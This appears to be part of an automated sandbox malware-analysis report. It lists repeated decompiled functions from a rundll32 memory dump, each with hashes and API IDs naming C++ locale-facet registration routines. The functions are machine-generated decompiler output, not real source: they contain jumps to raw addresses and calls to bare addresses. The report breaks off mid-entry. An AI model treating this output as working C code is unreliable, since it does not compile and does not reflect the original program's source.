                			E00000215215205D969C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681be8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b38; // 0x0
                				if (_t56 != 0) goto 0x205d9717;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b38 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9706;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b38 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b38; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d972b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d972d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d97ba;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9753;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9751;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9753;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d97ba;
                				if (_t79 == 0) goto 0x205d9762;
                				goto 0x205d97ba;
                				E00000215215205DC354(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9791;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681be8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ebf53693ca61634d0f30798a3cd7d75bf852eab6759eb8b02bf82c5fc4930c9a
                • Instruction ID: 587268fa65b153a6f8dcb5f43f9b7ec9bb3ef60e7c8d6bfba1066cb80ead441b
                • Opcode Fuzzy Hash: ebf53693ca61634d0f30798a3cd7d75bf852eab6759eb8b02bf82c5fc4930c9a
                • Instruction Fuzzy Hash: 19318D37316E20C1EB249B25E9582E963A5EBE5BE0F284293DE6D077EDDE34D4538700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205D97D4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c58; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b98; // 0x0
                				if (_t56 != 0) goto 0x205d984f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b98 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d983e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b98 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b98; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9863;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9865;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d98f2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d988b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9889;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d988b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d98f2;
                				if (_t79 == 0) goto 0x205d989a;
                				goto 0x205d98f2;
                				E00000215215205DC418(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d98c9;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c58 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: f495dc1e6ec0a961c91302726bed7290875b8ce15f498f7feb6d87f877cf8847
                • Instruction ID: 0505ab1c06daff74a81b16423123bccc3de5ff8943e5ebff825af262acabfefc
                • Opcode Fuzzy Hash: f495dc1e6ec0a961c91302726bed7290875b8ce15f498f7feb6d87f877cf8847
                • Instruction Fuzzy Hash: 06316B33706E60C1EB219B26E8582E96365EFE5BE0F2802939E6D077EDDE34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205D990C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c50; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b90; // 0x0
                				if (_t56 != 0) goto 0x205d9987;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b90 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9976;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b90 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b90; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d999b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d999d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9a2a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d99c3;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d99c1;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d99c3;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9a2a;
                				if (_t79 == 0) goto 0x205d99d2;
                				goto 0x205d9a2a;
                				E00000215215205DC4F8(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9a01;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c50 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 06c9a121b9170ac79d83c2c1fb836abff03bbcf052877500dedde9ed297f6708
                • Instruction ID: d86134e4fd85133d8aacf74673ea747252d218a44a09cfb6e121ced0eb7b0fe1
                • Opcode Fuzzy Hash: 06c9a121b9170ac79d83c2c1fb836abff03bbcf052877500dedde9ed297f6708
                • Instruction Fuzzy Hash: 39316B37306E20D1EA219B15E9682E96364EBF4BE0F180296EE6D477EDDE38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205D9A44(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bf8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b48; // 0x0
                				if (_t56 != 0) goto 0x205d9abf;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b48 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9aae;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b48 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b48; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9ad3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9ad5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9b62;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9afb;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9af9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9afb;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9b62;
                				if (_t79 == 0) goto 0x205d9b0a;
                				goto 0x205d9b62;
                				E00000215215205DC5D8(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9b39;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bf8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction ID: a683d0ea72adeb92687fc36ce48f9d85ab876eb05c2ad70babd2d676ed9b0345
                • Opcode Fuzzy Hash: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction Fuzzy Hash: A9317E33306E60C1FB219B15E4582E96364EBE4BE0F294293AE6D077EDDE34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205D9B7C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bf0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b40; // 0x0
                				if (_t56 != 0) goto 0x205d9bf7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b40 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9be6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b40 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b40; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9c0b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9c0d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9c9a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9c33;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9c31;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9c33;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9c9a;
                				if (_t79 == 0) goto 0x205d9c42;
                				goto 0x205d9c9a;
                				E00000215215205DC6B8(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9c71;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bf0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction ID: 03e4514fa9fa40e0625bb62bd161fbc021d68b2b1d545d76b563dcc6f76c36a8
                • Opcode Fuzzy Hash: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction Fuzzy Hash: 18314B37306E20D1EA219B15E5582E963A5EBE4BE0F584293EE6D076FDDA34D8438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D9CB4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c18; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b58; // 0x0
                				if (_t56 != 0) goto 0x205d9d2f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b58 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9d1e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b58 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b58; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9d43;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9d45;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9dd2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9d6b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9d69;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9d6b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9dd2;
                				if (_t79 == 0) goto 0x205d9d7a;
                				goto 0x205d9dd2;
                				E00000215215205DC798(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9da9;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c18 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction ID: e5a7a8bc397baedea1463cf89a56e59012a726ab1bd283f2a73de7afdb54b29f
                • Opcode Fuzzy Hash: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction Fuzzy Hash: 83316137306E64C1EB21AB16E5582D96765EBE4BE0F280293DE6D077EDDE38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D1D0C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t55;
                				signed long long _t56;
                				intOrPtr _t63;
                				intOrPtr* _t77;
                				long long _t78;
                				void* _t79;
                
                				_t50 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t79 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t78 =  *0x206818f8; // 0x0
                				_a24 = _t78;
                				_t55 =  *0x206818d8; // 0x0
                				if (_t55 != 0) goto 0x205d1d87;
                				E00000215215205D19DC(0,  &_a8);
                				_t42 =  *0x206818d8 - _t55; // 0x0
                				if (_t42 != 0) goto 0x205d1d76;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x206818d8 = _t50;
                				_t29 = E00000215215205D1A5C(_t50,  &_a8);
                				_t56 =  *0x206818d8; // 0x0
                				_t63 = _a8;
                				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d1d9b;
                				_t51 =  *((intOrPtr*)(_t63 + 0x10));
                				goto 0x205d1d9d;
                				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d1e2a;
                				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d1dc3;
                				E00000215215205D6CC0(_t29);
                				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d1dc1;
                				_t52 =  *((intOrPtr*)(_t51 + 0x10));
                				goto 0x205d1dc3;
                				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d1e2a;
                				if (_t78 == 0) goto 0x205d1dd2;
                				goto 0x205d1e2a;
                				E00000215215205D2824(0, 0, _t56,  &_a24, _t79, _t78, _t79);
                				if (_t52 != 0xffffffff) goto 0x205d1e01;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
                				asm("int3");
                				_t77 = _a24;
                				 *0x206818f8 = _t77;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction ID: dd7dc4c70a6ff763d5a11e584228347c81f632edf395bd81edf0e2354e95c883
                • Opcode Fuzzy Hash: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction Fuzzy Hash: 2C317F33306E60D1EB20AB16E5582D867A5EBE97E0F180253DE6D476EDDF34D4438704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D9DEC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bb8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b08; // 0x0
                				if (_t56 != 0) goto 0x205d9e67;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b08 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9e56;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b08 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b08; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9e7b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9e7d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9f0a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9ea3;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9ea1;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9ea3;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9f0a;
                				if (_t79 == 0) goto 0x205d9eb2;
                				goto 0x205d9f0a;
                				E00000215215205DC85C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9ee1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bb8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction ID: ac94f8fc14fc3a537a31976b9cde6b0d081bf7269800beb772c0c6506594bf60
                • Opcode Fuzzy Hash: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction Fuzzy Hash: 68314F37306E20C1EB21DB15E5582D96365EBE4BE0F280292DE6D477EDDA34D887C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D1E44(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t55;
                				signed long long _t56;
                				intOrPtr _t63;
                				intOrPtr* _t77;
                				long long _t78;
                				void* _t79;
                
                				_t50 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t79 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t78 =  *0x206818e0; // 0x0
                				_a24 = _t78;
                				_t55 =  *0x206818d0; // 0x0
                				if (_t55 != 0) goto 0x205d1ebf;
                				E00000215215205D19DC(0,  &_a8);
                				_t42 =  *0x206818d0 - _t55; // 0x0
                				if (_t42 != 0) goto 0x205d1eae;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x206818d0 = _t50;
                				_t29 = E00000215215205D1A5C(_t50,  &_a8);
                				_t56 =  *0x206818d0; // 0x0
                				_t63 = _a8;
                				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d1ed3;
                				_t51 =  *((intOrPtr*)(_t63 + 0x10));
                				goto 0x205d1ed5;
                				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d1f62;
                				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d1efb;
                				E00000215215205D6CC0(_t29);
                				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d1ef9;
                				_t52 =  *((intOrPtr*)(_t51 + 0x10));
                				goto 0x205d1efb;
                				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d1f62;
                				if (_t78 == 0) goto 0x205d1f0a;
                				goto 0x205d1f62;
                				E00000215215205D28E8(0, 0, _t56,  &_a24, _t79, _t78, _t79);
                				if (_t52 != 0xffffffff) goto 0x205d1f39;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
                				asm("int3");
                				_t77 = _a24;
                				 *0x206818e0 = _t77;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
